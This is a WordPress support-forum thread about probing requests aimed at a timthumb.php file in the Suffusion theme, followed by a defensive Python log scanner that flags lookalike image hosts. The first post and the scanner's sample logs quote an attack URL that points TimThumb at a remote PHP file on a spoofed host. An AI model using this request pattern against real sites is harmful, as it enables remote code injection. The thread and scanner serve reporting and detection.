Suffusion
Security Issue : timthumb.php (2 posts)

  1. ltoinel
    Member
    Posted 1 year ago #

    Hi, I don't use WordPress; however, I received some attacks directed at the Suffusion theme:

    http://xxxxxxxx/wp-content/themes/suffusion/timthumb.php?src=http://img.youtube.com.merkezefendi.gov.tr/cilik.php

    The attacker seems to use a fake host to inject malicious PHP code.

    Cheers!

  2. Sayontan Sinha
    Member
    Theme Author

    Posted 1 year ago #

    Suffusion doesn't have TimThumb. You can verify the source code from the official WP repository: http://themes.svn.wordpress.org/suffusion/4.4.4/. The last version of Suffusion to have TimThumb was 3.7.1, which was almost 2 years back. In fact I took TimThumb out of Suffusion 6 months before the TimThumb vulnerability was discovered.

    Attackers try thousands of random strings in the hopes of injecting malicious code, but rest assured that TimThumb is not a part of the Suffusion code. Moreover, every theme distributed through http://wordpress.org/extend/themes/ goes through a review, and TimThumb is not allowed in your code. So there is no theme on this site that has TimThumb in it.

Topic Closed

This topic has been closed to new replies.
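
A defensive log check for the request pattern in the first post, added here as an example that is not part of the thread or of any theme's code: it flags `timthumb.php` requests whose `src` host only contains a trusted-looking name such as `img.youtube.com` instead of ending with it. The trusted-host list, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: hosts the operator trusts for remote images. Only img.youtube.com
# appears in the thread; the other entry is illustrative.
TRUSTED_HOSTS = ("img.youtube.com", "upload.wikimedia.org")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation IP ranges, made-up dates).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2013:10:00:00 +0000] "GET /wp-content/themes/suffusion/timthumb.php?src=http://img.youtube.com.merkezefendi.gov.tr/cilik.php HTTP/1.1" 404 512',
    '192.0.2.11 - - [01/Jan/2013:10:00:05 +0000] "GET /wp-content/themes/example/timthumb.php?src=http://img.youtube.com/vi/abc/0.jpg&w=100 HTTP/1.1" 200 2048',
    '192.0.2.12 - - [01/Jan/2013:10:00:09 +0000] "GET /wp-content/themes/example/timthumb.php?src=/wp-content/uploads/a.jpg HTTP/1.1" 200 1024',
    '192.0.2.13 - - [01/Jan/2013:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 4096',
    '192.0.2.14 - - [01/Jan/2013:10:00:20 +0000] "GET /wp-content/themes/example/timthumb.php?src=http://files.example.net/x.php HTTP/1.1" 404 512',
]

def host_is_trusted(host):
    """Exact match, or a real subdomain: the trusted name must be the suffix."""
    host = host.lower().rstrip(".")
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)

def classify_src(src):
    """Classify a src= value as 'local', 'trusted', 'lookalike' or 'external'."""
    parts = urlsplit(src)
    host = parts.hostname or ""
    if parts.scheme not in ("http", "https") or not host:
        return "local"
    if host_is_trusted(host):
        return "trusted"
    # Trusted name embedded in a host that belongs to another domain, as in
    # the thread's img.youtube.com.<other domain> request.
    if any(t in host for t in TRUSTED_HOSTS):
        return "lookalike"
    return "external"

def scan(lines):
    """Return (line_no, verdict, src_host) for timthumb.php requests with an untrusted remote src."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if not target.path.lower().endswith("/timthumb.php"):
            continue
        for src in parse_qs(target.query).get("src", []):
            verdict = classify_src(src)
            if verdict in ("lookalike", "external"):
                findings.append((no, verdict, urlsplit(src).hostname))
    return findings
```

A 404 on such a request, as in the constructed lines, matches the theme author's point that the file is not present; a 200 would be the case to investigate.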
